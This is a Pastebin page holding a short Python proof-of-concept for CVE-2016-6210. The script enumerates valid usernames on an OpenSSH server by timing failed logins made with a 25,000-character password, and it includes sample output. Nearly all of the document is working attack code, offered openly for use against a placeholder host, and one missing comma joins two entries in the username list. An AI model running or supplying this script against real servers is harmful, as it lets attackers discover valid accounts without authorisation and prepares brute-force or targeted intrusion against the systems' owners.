Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #
- # cve-2016-6210
- #
- # Probe a remote system for valid user logins. Time each login attempt and
- # identify the longest response times as valid users. Note, only works on
- # systems allowing password authentication.
- #
- # http://seclists.org/fulldisclosure/2016/Jul/51
- #
- # Example output
- # --------------
- # User: richard Time:0.41101 # <--- valid user
- # User: blahblah Time:0.025953
- # User: fathead Time:0.025653 # >--- rest not valid
- # User: kahnadmin Time:0.025304
- # User: root Time:0.024087
- # User: gary Time:0.02364
- # User: bob Time:0.023276
- # User: joe Time:0.022937
- # User: susan Time:0.019751
- # User: kublai Time:0.019097
- # User: rick Time:0.01803
- import paramiko
- import time
- users = ['bob', 'joe', 'gary', 'richard', 'susan', 'rick', 'kublai', 'kahn'
- 'admin', 'root', 'blahblah', 'fathead']
- results = []
- if __name__ == '__main__':
- p='A'*25000
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- for user in users:
- starttime=time.clock()
- try: ssh.connect('remote.example.com', username=user,
- password=p)
- except:
- endtime=time.clock()
- total=endtime-starttime
- results.append((user, total))
- results = sorted(results, key=lambda x: x[1], reverse=True)
- # TODO: Compare each attempt time to average time; auto-suggest valid users
- for result in results:
- print('User: {} \t Time:{}'.format(result[0], result[1]))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement